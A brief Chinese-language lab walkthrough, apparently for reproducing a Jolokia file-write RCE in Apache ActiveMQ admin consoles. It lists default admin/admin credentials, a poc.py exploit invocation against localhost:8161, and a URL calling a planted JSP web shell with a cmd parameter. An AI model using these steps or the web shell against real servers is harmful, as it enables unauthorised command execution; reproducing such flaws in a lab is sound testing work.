Apache ActiveMQ Jolokia 后台远程代码执行漏洞

Apache ActiveMQ在5.16.5，5.17.3版本及以前，后台Jolokia存在一处任意文件写入导致的远程代码执行漏洞。

启动环境

admin/admin

方法一：利用poc

这个方法受到ActiveMQ版本的限制，因为Log4j2是在5.17.0中才引入Apache ActiveMQ

方法二：

python poc.py -u admin -p admin --exploit jfr http://localhost:8161

http://192.168.62.131:8161/admin/shelljfr.jsp?cmd=id